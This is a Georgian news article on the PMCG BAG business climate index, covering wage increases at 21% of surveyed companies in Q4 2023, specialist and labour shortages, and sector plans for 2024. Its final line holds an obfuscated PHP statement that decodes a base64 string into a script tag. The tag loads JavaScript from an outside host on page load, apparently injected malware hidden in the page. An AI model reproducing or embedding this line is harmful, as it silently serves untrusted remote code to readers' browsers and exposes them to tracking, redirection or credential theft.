celsiusi
ავერსი შნაიდერი

2023 წლის IV კვარტალში კომპანიების 21%-მა დასაქმებულთა ხელფასები გაზარდა. PMCG-ის მიერ გამოქვეყნებული BAG ინდექსის თანახმად, აღნიშნული ზრდა შესაძლოა, უკავშირდებოდეს საქართველოში სპეციალისტებისა და სამუშაო ძალის ნაკლებობის პრობლემას.

აღნიშნულ ფაქტორებს ხელის შემშლელად კომპანიათა დიდი ნაწილი აფიქსირებს (2023 წლის IV კვარტალში კომპანიათა 63%-მა სპეციალისტების ნაკლებობა, ხოლო 43%-მა სამუშაო ძალის ნაკლებობა დაასახელა ხელის შემშლელ ფაქტორებად).

"გამოკითხულ კომპანიათა შორის, ვინც 2023 წლის IV კვარტალში თანამშრომელთა ხელფასების ზრდა დააფიქსირა, უმრავლესობამ (90%-მა) 2023 წლის IV კვარტალში დასაქმებულთა ანაზღაურება 0-20%-ით გაზარდა. 2023 წლის IV კვარტალში, არც ერთ გამოკითხულ კომპანიას არ გაუზრდია დასაქმებულთა ანაზღაურება 40%-ზე მეტად.

სექტორების მიხედვით, 2023 წლის IV კვარტალში, მრეწველობის სექტორში კომპანიათა ყველაზე დიდმა ნაწილმა დასაქმებულთა ანაზღაურების ზრდა დააფიქსირა.

2024 წლის I კვარტალში დასაქმებულთა ანაზღაურების ზრდას კომპანიათა ყველაზე დიდი წილი (54%) მომსახურების სექტორში გეგმავს", - ნათქვამია კვლევაში.

ინფორმაციისთვის, BAG ბიზნეს კლიმატის მაჩვენებელი გამოითვლება BAG-ის წევრებისა და მათ ჯგუფში შემავალი კომპანიების გამოკითხვის საფუძველზე. კითხვარის მეშვეობით კომპანიები აფასებენ თავიანთ მიმდინარე მდგომარეობას და მომდევნო ექვსი თვის მოლოდინს. კომპანიები, ასევე, აფასებენ გაყიდვების, გაყიდვების ფასების, დასაქმებულთა რაოდენობის და დასაქმებულთა ანაზღაურების ცვლილებას გასულ და მიმდინარე კვარტლებში და აფიქსირებენ მოლოდინს მომდევნო კვარტლისთვის.

247
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");